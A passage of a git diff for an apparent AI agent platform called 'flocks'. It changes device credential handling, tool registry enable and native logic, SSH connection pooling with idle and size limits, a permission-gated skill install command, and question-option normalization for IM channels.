             if storage == "secret":
                 sid = field.get("secret_id") or fkey
@@ -223,6 +225,12 @@ async def _build_overrides(device_id: str) -> _DeviceOverrides:
                 config_ovr[ckey] = value
                 if ckey != fkey:
                     config_ovr[fkey] = value
+        # Preserve legacy device-scoped fields that are no longer listed in
+        # the current provider schema. This keeps old devices working after a
+        # schema split such as NGTIP's apiKey -> queryApiKey/platformApiKey.
+        for key, value in resolved_fields.items():
+            if key not in mapped_field_keys and key not in config_ovr:
+                config_ovr[key] = value
     else:
         # Fallback: no credential_fields metadata – use field values as-is
         for k, v in resolved_fields.items():
diff --git a/flocks/tool/device/intake.py b/flocks/tool/device/intake.py
index 1acbc34a5..b4589afc0 100644
--- a/flocks/tool/device/intake.py
+++ b/flocks/tool/device/intake.py
@@ -23,7 +23,12 @@
     DeviceTestRequest,
     DeviceTestResult,
 )
-from flocks.tool.device.secrets import delete_secrets, persist_fields, resolve_for_runtime
+from flocks.tool.device.secrets import (
+    delete_secrets,
+    mask_for_display,
+    persist_fields,
+    resolve_for_runtime,
+)
 from flocks.tool.device.store import (
     delete_device_row,
     ensure_default_group,
@@ -261,7 +266,7 @@ async def test_device(
         raise DeviceNotFoundError("Device not found")
 
     db_fields: dict = json.loads(row["fields"] or "{}")
-    resolved = resolve_for_runtime(db_fields)
+    resolved = _resolve_test_fields(db_fields, body)
     persisted_base_url = (resolved.get("base_url") or "").strip()
 
     override_base_url = (body.base_url.strip() if body and body.base_url else "")
@@ -295,6 +300,29 @@ async def test_device(
     return result
 
 
+def _resolve_test_fields(
+    db_fields: dict,
+    body: Optional[DeviceTestRequest],
+) -> dict[str, str]:
+    """Overlay unsaved form values onto the persisted fields for one probe.
+
+    Blank or still-masked drafts of a stored secret keep the stored value.
+    """
+    resolved = resolve_for_runtime(db_fields)
+    if not (body and body.fields):
+        return resolved
+
+    shown, _ = mask_for_display(db_fields)
+    merged = dict(resolved)
+    for name, raw in body.fields.items():
+        draft = raw if isinstance(raw, str) else ""
+        stored, shown_value = resolved.get(name, ""), shown.get(name, "")
+        secret_is_masked = bool(stored) and shown_value != stored
+        if not (secret_is_masked and draft in {"", shown_value}):
+            merged[name] = draft
+    return merged
+
+
 async def _probe(base_url: str, *, verify_ssl: bool) -> DeviceTestResult:
     start = time.monotonic()
 
diff --git a/flocks/tool/device/models.py b/flocks/tool/device/models.py
index 0072653ce..6c16d9074 100644
--- a/flocks/tool/device/models.py
+++ b/flocks/tool/device/models.py
@@ -164,6 +164,10 @@ class DeviceTestResult(BaseModel):
 class DeviceTestRequest(BaseModel):
     """Optional body for ``POST /devices/{id}/test``."""
 
+    fields: Optional[Dict[str, str]] = Field(
+        None,
+        description="Unsaved form fields to use for this probe only",
+    )
     base_url: Optional[str] = Field(
         None,
         description="Override the persisted base_url for this probe only",
diff --git a/flocks/tool/device/plugin_index.py b/flocks/tool/device/plugin_index.py
index 202805def..d138de485 100644
--- a/flocks/tool/device/plugin_index.py
+++ b/flocks/tool/device/plugin_index.py
@@ -29,14 +29,26 @@
 
 _SAFE_ID = re.compile(r"^[A-Za-z0-9][A-Za-z0-9_-]*$")
 _SAFE_SERVICE_ID = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*$")
+_template_cache: Optional[list[DeviceTemplate]] = None
+
+
+def clear_device_template_cache() -> None:
+    """Reset the in-process template cache so the next listing rebuilds it."""
+    global _template_cache
+    _template_cache = None
 
 
 def list_device_templates(*, refresh: bool = False) -> list[DeviceTemplate]:
     """Return device templates from Hub catalog plus local descriptor discovery."""
+    global _template_cache
+    if _template_cache is not None and not refresh:
+        return list(_template_cache)
+
     if refresh:
         _refresh_device_plugin_runtime()
 
     by_key: dict[str, DeviceTemplate] = {}
+    tool_counts = _device_tool_counts()
     for entry in hub_catalog.list_catalog(plugin_type="device"):
         root = _catalog_entry_root(entry)
         if root is None:
@@ -66,6 +78,7 @@ def list_device_templates(*, refresh: bool = False) -> list[DeviceTemplate]:
             fallback_description=entry.description,
             fallback_description_cn=entry.descriptionCn,
             fallback_version=entry.installedVersion or entry.version,
+            tool_counts=tool_counts,
         )
         if template is not None:
             by_key[template.storage_key] = template
@@ -89,9 +102,12 @@ def list_device_templates(*, refresh: bool = False) -> list[DeviceTemplate]:
             state="localOnly",
             installed=True,
             source=source,
+            tool_counts=tool_counts,
         )
 
-    return sorted(by_key.values(), key=_sort_key)
+    templates = sorted(by_key.values(), key=_sort_key)
+    _template_cache = templates
+    return list(templates)
 
 
 def create_custom_device_template(body: CustomDeviceTemplateCreate) -> DeviceTemplate:
@@ -145,6 +161,7 @@ def create_custom_device_template(body: CustomDeviceTemplateCreate) -> DeviceTem
 
 def _refresh_device_plugin_runtime() -> None:
     """Refresh both device descriptors and runtime tool registrations."""
+    clear_device_template_cache()
     discover_api_service_descriptors(refresh=True)
     try:
         ToolRegistry.refresh_plugin_tools()
@@ -163,6 +180,7 @@ def _template_from_plugin_root(
     fallback_description: Optional[str] = None,
     fallback_description_cn: Optional[str] = None,
     fallback_version: Optional[str] = None,
+    tool_counts: Optional[dict[str, int]] = None,
 ) -> Optional[DeviceTemplate]:
     provider = _read_provider_yaml(root)
     if _integration_type(provider) != "device":
@@ -187,6 +205,7 @@ def _template_from_plugin_root(
         fallback_name=fallback_name,
         fallback_description=fallback_description,
         fallback_description_cn=fallback_description_cn,
+        tool_counts=tool_counts,
     )
 
 
@@ -201,6 +220,7 @@ def _template_from_descriptor(
     fallback_name: Optional[str] = None,
     fallback_description: Optional[str] = None,
     fallback_description_cn: Optional[str] = None,
+    tool_counts: Optional[dict[str, int]] = None,
 ) -> DeviceTemplate:
     name = _template_name(provider, descriptor, fallback_name, plugin_id)
     description = _optional_str(provider.get("description")) or fallback_description
@@ -218,7 +238,7 @@ def _template_from_descriptor(
             field.model_dump(mode="json")
             for field in _build_api_service_credential_schema(descriptor.storage_key, provider)
         ],
-        tool_count=_tool_count(descriptor.storage_key, descriptor.provider_yaml.parent),
+        tool_count=_tool_count(descriptor.storage_key, descriptor.provider_yaml.parent, tool_counts),
         installed=installed,
         state=state,  # type: ignore[arg-type]
         source=source,  # type: ignore[arg-type]
@@ -303,17 +323,29 @@ def _source_from_path(path: Optional[Path]) -> str:
     return "bundled"
 
 
-def _tool_count(storage_key: str, root: Path) -> int:
+def _device_tool_counts() -> Optional[dict[str, int]]:
     try:
         ToolRegistry.init()
-        count = len([
-            tool for tool in ToolRegistry.list_tools()
-            if tool.source == "device" and tool.provider == storage_key
-        ])
-        if count:
-            return count
     except Exception as exc:
         log.debug("device.templates.tool_registry_unavailable", {"error": str(exc)})
+        return None
+
+    counts: dict[str, int] = {}
+    for tool in ToolRegistry.list_tools():
+        if tool.source != "device" or not tool.provider:
+            continue
+        counts[tool.provider] = counts.get(tool.provider, 0) + 1
+    return counts
+
+
+def _tool_count(
+    storage_key: str,
+    root: Path,
+    tool_counts: Optional[dict[str, int]] = None,
+) -> int:
+    count = tool_counts.get(storage_key, 0) if tool_counts is not None else 0
+    if count:
+        return count
 
     return len([
         path for path in _tool_yaml_files(root)
diff --git a/flocks/tool/file/glob.py b/flocks/tool/file/glob.py
index b0c5ab760..c9f5eb8a0 100644
--- a/flocks/tool/file/glob.py
+++ b/flocks/tool/file/glob.py
@@ -32,7 +32,7 @@
 - Returns matching file paths sorted by modification time
 - Use this tool when you need to find files by name patterns
 - When you are doing an open-ended search that may require multiple rounds of globbing and grepping, prefer delegating that exploration or use a more specialized search workflow
-- You have the capability to call multiple tools in a single response. It is always better to speculatively perform multiple searches as a batch that are potentially useful."""
+- You may call multiple independent tools in the same response. Prefer separate parallel Glob calls when multiple searches are likely to be useful."""
 
 
 def find_ripgrep() -> Optional[str]:
diff --git a/flocks/tool/file/read.py b/flocks/tool/file/read.py
index 9481c5646..cd2ed8683 100644
--- a/flocks/tool/file/read.py
+++ b/flocks/tool/file/read.py
@@ -61,7 +61,7 @@
 - For files longer than 2000 lines, you MUST use offset and limit to read in segments (e.g. offset=0 limit=2000, then offset=2000 limit=2000, etc.)
 - Any lines longer than 2000 characters will be truncated
 - Text results are returned with a 5-digit, zero-padded 1-based line number prefix in the form `00001| `
-- You have the capability to call multiple tools in a single response. It is always better to speculatively read multiple files as a batch that are potentially useful.
+- You may call multiple independent tools in the same response. Prefer separate parallel Read calls when multiple files are likely to be useful.
 - If you read a file that exists but has empty contents you will receive a system reminder warning in place of file contents.
 - You can read image files using this tool."""
 
diff --git a/flocks/tool/question_handler.py b/flocks/tool/question_handler.py
index 4cc3e94f8..21ee7a89c 100644
--- a/flocks/tool/question_handler.py
+++ b/flocks/tool/question_handler.py
@@ -15,7 +15,12 @@
     is_request_rejected,
     clear_request_state,
 )
-from flocks.tool.system.question import QuestionRejectedError, get_current_message_id, get_current_call_id
+from flocks.tool.system.question import (
+    QuestionRejectedError,
+    get_current_call_id,
+    get_current_message_id,
+    normalize_question_option,
+)
 
 
 log = Log.create(service="question-handler")
@@ -68,22 +73,18 @@ async def api_question_handler(
         # Convert options format for QuestionInfo
         options = []
         for opt in q.get("options", []):
-            if isinstance(opt, dict):
-                options.append({
-                    "label": str(opt.get("label", "")),
-                    "description": str(opt.get("description", "")),
-                })
-            elif isinstance(opt, str):
-                options.append({
-                    "label": opt,
-                    "description": "",
-                })
+            option = normalize_question_option(opt)
+            if option is not None:
+                options.append(option)
         
         # Build QuestionInfo
+        question_type = q.get("type", "choice")
+        if question_type == "choice" and not options:
+            question_type = "text"
         question_info = {
             "question": str(q.get("question", "")),
             "header": str(q.get("header", "")),
-            "type": q.get("type", "choice"),
+            "type": question_type,
             "options": options,
             "multiple": q.get("multiple", False),
             "placeholder": q.get("placeholder", ""),
diff --git a/flocks/tool/registry.py b/flocks/tool/registry.py
index 229361ac8..f76c1fa53 100644
--- a/flocks/tool/registry.py
+++ b/flocks/tool/registry.py
@@ -680,7 +680,7 @@ def register_function(
         category: ToolCategory = ToolCategory.CUSTOM,
         parameters: Optional[List[ToolParameter]] = None,
         requires_confirmation: bool = False,
-        native: bool = False,
+        native: Optional[bool] = None,
         always_load: Optional[bool] = None,
         tags: Optional[List[str]] = None,
         enabled: bool = True,
@@ -688,11 +688,11 @@ def register_function(
         """
         Decorator to register a function as a tool.
 
-        ``native`` defaults to False (safe default).  Built-in tools get
-        ``native=True`` in bulk by ``_register_builtin_tools()`` after all
-        built-in modules are imported, so callers don't need to pass it
-        explicitly.  User plugin Python files that use this decorator will
-        correctly stay ``native=False``.
+        ``native=None`` means the loading context decides. Built-in tools get
+        ``native=True`` in bulk by ``_register_builtin_tools()`` only when the
+        decorator did not explicitly pass ``native``. User plugin Python files
+        that use this decorator still default to ``native=False`` unless their
+        loading path marks them project-level.
 
         Usage:
             @ToolRegistry.register_function(
@@ -704,18 +704,20 @@ async def read_tool(ctx: ToolContext, filePath: str) -> ToolResult:
                 ...
         """
         def decorator(func: ToolHandler) -> ToolHandler:
-            info = ToolInfo(
-                name=name,
-                description=description,
-                description_cn=description_cn,
-                category=category,
-                parameters=parameters or [],
-                requires_confirmation=requires_confirmation,
-                native=native,
-                always_load=always_load,
-                tags=list(tags or []),
-                enabled=enabled,
-            )
+            info_kwargs: Dict[str, Any] = {
+                "name": name,
+                "description": description,
+                "description_cn": description_cn,
+                "category": category,
+                "parameters": parameters or [],
+                "requires_confirmation": requires_confirmation,
+                "always_load": always_load,
+                "tags": list(tags or []),
+                "enabled": enabled,
+            }
+            if native is not None:
+                info_kwargs["native"] = native
+            info = ToolInfo(**info_kwargs)
             tool = Tool(info=info, handler=func)
             cls.register(tool)
             return func
@@ -775,12 +777,6 @@ async def execute(
                 error=f"Tool not found: {tool_name}"
             )
 
-        if not tool.info.enabled:
-            return ToolResult(
-                success=False,
-                error=f"Tool is disabled: {tool_name}"
-            )
-
         # Create default context if not provided
         if ctx is None:
             ctx = ToolContext(
@@ -794,6 +790,7 @@ async def execute(
         })
 
         device_id = kwargs.pop("device_id", None)
+        per_device_enabled = None
 
         if tool.info.source == "device" and tool.info.provider:
             try:
@@ -814,13 +811,23 @@ async def execute(
             if resolution_error:
                 return ToolResult(success=False, error=resolution_error)
             device_id = resolved_device_id
+        elif not tool.info.enabled:
+            return ToolResult(
+                success=False,
+                error=f"Tool is disabled: {tool_name}"
+            )
+
+        if not tool.info.enabled:
+            return ToolResult(
+                success=False,
+                error=f"Tool is disabled: {tool_name}"
+            )
 
         if device_id:
-            # Per-device tool enable gate: an individual device instance may
-            # have its own enabled=False override independent of the shared
-            # global tool_settings.  This prevents toggling a tool "for
-            # Device A" from affecting Device B when both share the same
-            # storage_key (same plugin version, different names).
+            # Per-device tool enable gate: a device instance may carry a
+            # disabled override independent of the shared global tool state.
+            # A stored enabled=True row is legacy data and is treated the same
+            # as no override; it must not bypass the global disabled state.
             try:
                 from flocks.tool.device.store import get_device_tool_enabled
                 per_device_enabled = await get_device_tool_enabled(device_id, tool_name)
@@ -837,6 +844,7 @@ async def execute(
                     "tool": tool_name, "device_id": device_id, "error": str(_gate_err),
                 })
 
+        if device_id:
             from flocks.tool.credential_context import activate_device_credentials
             async with activate_device_credentials(device_id) as activated:
                 if not activated:
@@ -1018,9 +1026,8 @@ def init(cls) -> None:
     def _load_plugin_tools(cls) -> None:
         """Load plugin tools from both user-level and project-level plugin dirs on init.
 
-        Without this, YAML/Python plugin tools only appear after
-        ``PluginLoader.load_all()`` is triggered by Agent initialization
-        or an explicit ``POST /api/tools/refresh``.
+        Without this, YAML/Python plugin tools only appear after an explicit
+        ``POST /api/tools/refresh`` or a tool registry initialization pass.
 
         Scans both:
         - ``~/.flocks/plugins/tools/`` (user-level)
@@ -1033,7 +1040,8 @@ def _load_plugin_tools(cls) -> None:
         before = set(cls._tools.keys())
         try:
             from flocks.plugin import PluginLoader
-            PluginLoader.load_all()
+
+            PluginLoader.load_extension("TOOLS", load_entry_points=True)
         except Exception as e:
             log.warn("tool_registry.plugin_load_failed", {"error": str(e)})
         after = set(cls._tools.keys())
@@ -1457,7 +1465,7 @@ def _register_builtin_tools(cls) -> None:
             # device/ — security device asset context
             ("flocks.tool.device", ["device_context_tool"]),
             # channel/ — IM platform messaging
-            ("flocks.tool.channel", ["channel_message"]),
+            ("flocks.tool.channel", ["channel_message", "im_send_message"]),
             # wecom/ — 企业微信 MCP（文档、智能表格）
             ("flocks.tool.wecom", ["wecom_mcp"]),
         ]
@@ -1468,23 +1476,18 @@ def _register_builtin_tools(cls) -> None:
                 except ImportError as e:
                     log.warn("builtin_tools.import_failed", {"module": f"{package}.{mod_name}", "error": str(e)})
 
-        # Mark every tool registered during this call as native=True, except
-        # for built-in modules that should remain non-native by policy.
-        # This is done in bulk here so individual @register_function call
-        # sites don't need to pass native=True, and user plugin files using
-        # the same decorator won't be misclassified.
-        builtin_native_exceptions = {
-            "lsp",
-            "task",
-            "list_providers",
-            "add_provider",
-            "add_model",
-        }
+        # Mark built-in tools native=True only when the decorator did not
+        # explicitly declare native. This keeps the default convenient for
+        # built-ins while preserving native=False for management tools that
+        # should be discovered through tool_search.
         for name in set(cls._tools.keys()) - before:
-            if name in builtin_native_exceptions:
-                cls._tools[name].info.native = False
+            tool = cls._tools[name]
+            fields_set = getattr(tool.info, "model_fields_set", None)
+            if fields_set is None:
+                fields_set = getattr(tool.info, "__fields_set__", set())
+            if "native" in fields_set:
                 continue
-            cls._tools[name].info.native = True
+            tool.info.native = True
 
         # Sample tools for testing (only register if not already registered)
         if "get_time" not in cls._tools:
@@ -1568,8 +1571,17 @@ def _reset_failure_state(cls, tool_name: str) -> None:
 
     @classmethod
     def _should_track_failure(cls, tool: Tool) -> bool:
-        """Track failures only for custom tools to avoid disabling core tools."""
-        return tool.info.category == ToolCategory.CUSTOM and tool.info.name != "invalid"
+        """Track failures only for standalone custom tools.
+
+        Device-backed tools have per-device switches; repeated upstream/API
+        failures should not mutate the shared in-memory switch for every
+        device instance.
+        """
+        return (
+            tool.info.category == ToolCategory.CUSTOM
+            and tool.info.name != "invalid"
+            and tool.info.source != "device"
+        )
 
     @classmethod
     def _is_countable_error(cls, error: Optional[str]) -> bool:
diff --git a/flocks/tool/security/ssh_utils.py b/flocks/tool/security/ssh_utils.py
index 9429a4d75..5ea1580c9 100644
--- a/flocks/tool/security/ssh_utils.py
+++ b/flocks/tool/security/ssh_utils.py
@@ -7,6 +7,10 @@
 """
 
 import asyncio
+import os
+import time
+from collections import OrderedDict
+from dataclasses import dataclass
 from datetime import datetime, timezone
 from pathlib import Path
 from typing import Optional
@@ -54,16 +58,76 @@ def audit_log(
 # Session-level SSH connection pool
 # ---------------------------------------------------------------------------
 
+
+DEFAULT_POOL_MAX_CONNECTIONS = 128
+DEFAULT_POOL_IDLE_TTL_S = 120.0
+
+
+def _env_int(name: str, default: int, minimum: int) -> int:
+    """Read integer env var *name*, raised to at least *minimum*; else *default*."""
+    text = os.getenv(name)
+    if text:
+        try:
+            return max(minimum, int(text))
+        except ValueError:
+            log.warn("ssh_pool.invalid_int_env", {"name": name, "value": text})
+    return default
+
+
+def _env_float(name: str, default: float, minimum: float) -> float:
+    """Read float env var *name*, raised to at least *minimum*; else *default*."""
+    text = os.getenv(name)
+    if text:
+        try:
+            return max(minimum, float(text))
+        except ValueError:
+            log.warn("ssh_pool.invalid_float_env", {"name": name, "value": text})
+    return default
+
+
+@dataclass
+class _PoolEntry:
+    conn: asyncssh.SSHClientConnection  # the pooled SSH connection
+    last_used: float  # time.monotonic() stamp of the most recent get/release
+    in_use: int = 0  # get_connection() calls not yet matched by a release
+
+
 class SSHConnectionPool:
     """Per-session SSH connection cache.
 
     Keeps at most one connection per (session_id, host, port, username) tuple.
-    Connections are released when the pool is explicitly closed or when the
-    pool object is garbage-collected.
+    Idle connections are released by LRU/TTL pressure, explicit session close,
+    or process shutdown.
     """
 
-    def __init__(self) -> None:
-        self._connections: dict[tuple[str, str, int, str], asyncssh.SSHClientConnection] = {}
+    def __init__(
+        self,
+        *,
+        max_connections: Optional[int] = None,
+        idle_ttl_s: Optional[float] = None,
+    ) -> None:
+        self.max_connections = (
+            max_connections
+            if max_connections is not None
+            else _env_int(
+                "FLOCKS_SSH_POOL_MAX_CONNECTIONS",
+                DEFAULT_POOL_MAX_CONNECTIONS,
+                1,
+            )
+        )
+        self.idle_ttl_s = (
+            idle_ttl_s
+            if idle_ttl_s is not None
+            else _env_float(
+                "FLOCKS_SSH_POOL_IDLE_TTL_SECONDS",
+                DEFAULT_POOL_IDLE_TTL_S,
+                1.0,
+            )
+        )
+        self._connections: OrderedDict[
+            tuple[str, str, int, str],
+            _PoolEntry,
+        ] = OrderedDict()
         self._locks: dict[tuple[str, str, int, str], asyncio.Lock] = {}
         self._global_lock = asyncio.Lock()
 
@@ -79,7 +143,7 @@ async def get_connection(
         key_path: Optional[str],
         password: Optional[str],
     ) -> asyncssh.SSHClientConnection:
-        """Return an existing connection or create a new one.
+        """Return an existing connection or create a new one and mark it in use.
 
         Stale connections are not proactively detected here — the caller is
         responsible for catching connection errors and calling
@@ -89,13 +153,19 @@ async def get_connection(
         key = self._key(session_id, host, port, username)
 
         async with self._global_lock:
+            self._prune_idle_locked(time.monotonic())
             if key not in self._locks:
                 self._locks[key] = asyncio.Lock()
 
         async with self._locks[key]:
-            conn = self._connections.get(key)
-            if conn is not None:
-                return conn
+            now = time.monotonic()
+            async with self._global_lock:
+                entry = self._connections.get(key)
+                if entry is not None:
+                    entry.in_use += 1
+                    entry.last_used = now
+                    self._connections.move_to_end(key)
+                    return entry.conn
 
             connect_kwargs: dict = dict(
                 host=host,
@@ -111,35 +181,115 @@ async def get_connection(
                 connect_kwargs["password"] = password
 
             conn = await asyncssh.connect(**connect_kwargs)
-            self._connections[key] = conn
+            async with self._global_lock:
+                self._connections[key] = _PoolEntry(
+                    conn=conn,
+                    last_used=time.monotonic(),
+                    in_use=1,
+                )
+                self._connections.move_to_end(key)
+                self._enforce_limits_locked()
             return conn
 
-    def invalidate_connection(
+    async def release_connection(
+        self, session_id: str, host: str, port: int, username: str
+    ) -> None:
+        """Drop one in-use reference on a pooled connection and refresh its LRU slot."""
+        pool_key = self._key(session_id, host, port, username)
+        async with self._global_lock:
+            pooled = self._connections.get(pool_key)
+            if pooled is not None:
+                released_at = time.monotonic()
+                pooled.in_use = max(0, pooled.in_use - 1)
+                pooled.last_used = released_at
+                self._connections.move_to_end(pool_key)
+                self._prune_idle_locked(released_at)
+                self._enforce_limits_locked()
+
+    async def invalidate_connection(
         self, session_id: str, host: str, port: int, username: str
     ) -> None:
-        """Evict a stale connection from the pool so the next call reconnects."""
+        """Close and evict a stale connection so the next call reconnects."""
         key = self._key(session_id, host, port, username)
-        self._connections.pop(key, None)
+        async with self._global_lock:
+            entry = self._connections.pop(key, None)
+            self._locks.pop(key, None)
+        if entry is not None:
+            self._close_connection(entry.conn)
 
     async def close_session(self, session_id: str) -> None:
         """Close all connections belonging to *session_id*."""
-        to_close: list[tuple] = [k for k in self._connections if k[0] == session_id]
-        for key in to_close:
-            conn = self._connections.pop(key, None)
-            if conn:
-                try:
-                    conn.close()
-                except Exception:
-                    pass
+        async with self._global_lock:
+            to_close: list[tuple] = [
+                k for k in self._connections if k[0] == session_id
+            ]
+            entries = [self._connections.pop(key) for key in to_close]
+            for key in to_close:
+                self._locks.pop(key, None)
+        for entry in entries:
+            self._close_connection(entry.conn)
 
     async def close_all(self) -> None:
         """Close every cached connection."""
-        for conn in self._connections.values():
-            try:
-                conn.close()
-            except Exception:
-                pass
-        self._connections.clear()
+        async with self._global_lock:
+            entries = list(self._connections.values())
+            self._connections.clear()
+            self._locks.clear()
+        for entry in entries:
+            self._close_connection(entry.conn)
+
+    def _prune_idle_locked(self, now: float) -> None:
+        """Evict and close idle entries past the TTL. Caller must hold ``_global_lock``."""
+        if self.idle_ttl_s <= 0:
+            return
+        stale_keys = []
+        for key, entry in self._connections.items():
+            idle_for = now - entry.last_used
+            if entry.in_use <= 0 and idle_for >= self.idle_ttl_s:
+                stale_keys.append(key)
+        for key in stale_keys:
+            stale = self._connections.pop(key, None)
+            self._locks.pop(key, None)
+            if stale is not None:
+                self._close_connection(stale.conn)
+
+    def _enforce_limits_locked(self) -> None:
+        """Evict idle entries while over the cap. Caller must hold ``_global_lock``."""
+        if self.max_connections <= 0:
+            return
+        while len(self._connections) > self.max_connections:
+            # Iteration follows insertion/move_to_end order: first idle key wins.
+            victim_key = next(
+                (k for k, e in self._connections.items() if e.in_use <= 0),
+                None,
+            )
+            if victim_key is None:
+                # Only active connections remain: tolerate the overflow instead
+                # of closing a connection that is still running a command.
+                return
+            victim = self._connections.pop(victim_key, None)
+            self._locks.pop(victim_key, None)
+            if victim is not None:
+                self._close_connection(victim.conn)
+
+    def _close_connection(self, conn: asyncssh.SSHClientConnection) -> None:
+        """Close *conn*, deliberately swallowing any exception (best effort)."""
+        try:
+            conn.close()
+        except Exception:
+            pass
+
+    def stats(self) -> dict[str, int | float]:
+        """Snapshot pool counters (sizes, active count, limits) for diagnostics."""
+        entries = self._connections.values()
+        busy = len([entry for entry in entries if entry.in_use > 0])
+        return {
+            "connections": len(self._connections),
+            "locks": len(self._locks),
+            "active_connections": busy,
+            "max_connections": self.max_connections,
+            "idle_ttl_s": self.idle_ttl_s,
+        }
 
 
 _pool = SSHConnectionPool()
@@ -209,6 +359,7 @@ async def execute_ssh_command(
         (exit_code, stdout, stderr)
     """
     if session_id:
+        invalidated = False
         conn = await _pool.get_connection(
             session_id=session_id,
             host=host, port=port, username=username,
@@ -226,21 +377,28 @@ async def execute_ssh_command(
             )
         except (asyncssh.ConnectionLost, asyncssh.DisconnectError, BrokenPipeError, OSError):
             # Stale connection — evict from pool and retry with a fresh one.
-            _pool.invalidate_connection(session_id, host, port, username)
+            invalidated = True
+            await _pool.invalidate_connection(session_id, host, port, username)
             conn = await _pool.get_connection(
                 session_id=session_id,
                 host=host, port=port, username=username,
                 key_path=key_path, password=password,
             )
-            result = await asyncio.wait_for(
-                conn.run(command, check=False),
-                timeout=timeout_s,
-            )
-            return (
-                result.exit_status or 0,
-                result.stdout or "",
-                result.stderr or "",
-            )
+            try:
+                result = await asyncio.wait_for(
+                    conn.run(command, check=False),
+                    timeout=timeout_s,
+                )
+                return (
+                    result.exit_status or 0,
+                    result.stdout or "",
+                    result.stderr or "",
+                )
+            finally:
+                await _pool.release_connection(session_id, host, port, username)
+        finally:
+            if not invalidated:
+                await _pool.release_connection(session_id, host, port, username)
 
     connect_kwargs: dict = dict(
         host=host,
diff --git a/flocks/tool/skill/flocks_skills.py b/flocks/tool/skill/flocks_skills.py
index acb8a7fe4..8b577cc60 100644
--- a/flocks/tool/skill/flocks_skills.py
+++ b/flocks/tool/skill/flocks_skills.py
@@ -91,6 +91,30 @@
 _READ_ONLY_SUBCOMMANDS = frozenset({"find", "status"})
 
 
+def _parse_install_args(args: str) -> tuple[Optional[str], str]:
+    """Parse ``install`` arguments into ``(source, scope)``; scope defaults to "global".
+
+    The source is the first non-option token. Option-like tokens (``--yes``, a
+    trailing ``--scope`` with no value, unknown flags) never become the source.
+    """
+    tokens = shlex.split(args.strip()) if args.strip() else []
+    source: Optional[str] = None
+    scope = "global"
+    i = 0
+    while i < len(tokens):
+        token = tokens[i]
+        i += 1
+        if token == "--scope":
+            if i < len(tokens):  # a trailing --scope has no value to consume
+                scope = tokens[i]
+                i += 1
+        elif token.startswith("--scope="):
+            scope = token.split("=", 1)[1]
+        elif source is None and not token.startswith("-"):
+            source = token
+    return source, scope
+
+
 def _flocks_executable() -> Optional[str]:
     """Locate the `flocks` CLI on PATH."""
     return shutil.which("flocks")
@@ -141,6 +165,54 @@ async def flocks_skills(
             ),
         )
 
+    if subcommand == "install":
+        source, scope = _parse_install_args(args)
+        if not source:
+            return ToolResult(
+                success=False,
+                error="install requires a source, e.g. github:owner/repo/skill-name",
+            )
+        if scope not in {"global", "project"}:
+            return ToolResult(
+                success=False,
+                error="install --scope must be 'global' or 'project'",
+            )
+        await ctx.ask(
+            permission="bash",
+            patterns=[f"flocks skills install {source} --scope {scope} --yes"],
+            always=["*flocks skills *"],
+            metadata={"subcommand": subcommand},
+        )
+        try:
+            from flocks.skill.installer import SkillInstaller
+
+            result = await SkillInstaller.install_from_source(
+                source,
+                scope=scope,
+                yes=True,
+            )
+        except Exception as exc:
+            return ToolResult(
+                success=False,
+                error=f"Skill install failed: {exc}",
+                title="flocks skills install",
+            )
+        if not result.success:
+            return ToolResult(
+                success=False,
+                error=result.error or result.message or "Skill install failed",
+                title="flocks skills install",
+            )
+        return ToolResult(
+            success=True,
+            output={
+                "message": result.message,
+                "skill_name": result.skill_name,
+                "location": result.location,
+            },
+            title="flocks skills install",
+        )
+
     flocks_bin = _flocks_executable()
     if flocks_bin is None:
         return ToolResult(
diff --git a/flocks/tool/system/question.py b/flocks/tool/system/question.py
index d856fd565..4fb80273e 100644
--- a/flocks/tool/system/question.py
+++ b/flocks/tool/system/question.py
@@ -92,6 +92,136 @@ class QuestionRejectedError(Exception):
 The user's answers will be returned for you to continue with."""
 
 
+_OPTION_LABEL_KEYS = ("label", "text", "title", "name", "value", "id", "key")
+_OPTION_DESCRIPTION_KEYS = ("description", "desc", "subtitle", "detail", "details")
+
+
+def _first_non_empty_string(data: Dict[str, Any], keys: tuple[str, ...]) -> str:
+    """Return the first non-blank stringified value found under ``keys``, else ""."""
+    # Keys that are missing or map to None are skipped, not rendered as "None".
+    stripped = (
+        str(data[name]).strip()
+        for name in keys
+        if data.get(name) is not None
+    )
+    return next((text for text in stripped if text), "")
+
+
+def normalize_question_option(opt: Any) -> Optional[Dict[str, str]]:
+    """Coerce one option into ``{"label", "description"}``; None when it has no text.
+
+    Dicts are probed via the label/description alias keys, and a lone
+    description is promoted to the label. Any other value is stringified.
+    """
+    if isinstance(opt, dict):
+        title = _first_non_empty_string(opt, _OPTION_LABEL_KEYS)
+        detail = _first_non_empty_string(opt, _OPTION_DESCRIPTION_KEYS)
+        if not title:
+            # Only a description was supplied: show it as the label instead.
+            title, detail = detail, ""
+    else:
+        # Strings and other scalars carry no description; None yields no text.
+        title = "" if opt is None else str(opt).strip()
+        detail = ""
+    return {"label": title, "description": detail} if title else None
+
+
+def _format_channel_question_text(questions: List[Dict[str, Any]]) -> str:
+    """Build the plain-text IM rendering of already-normalized questions.
+
+    Each question becomes a block of lines (header, question, numbered options,
+    reply hint); blocks are joined by a blank line. Questions are numbered only
+    when there is more than one.
+    """
+    numbered = len(questions) > 1
+    rendered: list[str] = []
+    for position, item in enumerate(questions, start=1):
+        kind = str(item.get("type") or "choice")
+        choices = item.get("options") or []
+        body = str(item.get("question") or "").strip()
+        parts: list[str] = [
+            str(item.get("header") or "").strip(),
+            f"{position}. {body}" if numbered else body,
+        ]
+
+        if choices and kind in {"choice", "confirm"}:
+            for number, choice in enumerate(choices, start=1):
+                name = str(choice.get("label", "")).strip()
+                note = str(choice.get("description", "") or "").strip()
+                parts.append(f"{number}. {name} - {note}" if note else f"{number}. {name}")
+            parts.append("请回复选项序号、选项文本，或直接补充你的答案。")
+        else:
+            parts.append("请直接回复你的答案。")
+        # Empty entries (no header, blank question) are dropped before joining.
+        rendered.append("\n".join(part for part in parts if part))
+
+    return "\n\n".join(rendered)
+
+
+async def _send_channel_question_if_applicable(
+    ctx: ToolContext,
+    questions: List[Dict[str, Any]],
+) -> ToolResult | None:
+    """Send the question as a plain text IM message for channel sessions.
+
+    Channel sessions have no Web UI answer transport, so return without waiting:
+    None if the session has no bindings, else a deferred success or failure result.
+    """
+    try:
+        from flocks.channel.inbound.session_binding import SessionBindingService
+        from flocks.channel.outbound.deliver import OutboundDelivery
+        from flocks.channel.base import OutboundContext
+
+        svc = SessionBindingService()
+        bindings = await svc.get_bindings_by_session(ctx.session_id)
+        if not bindings:
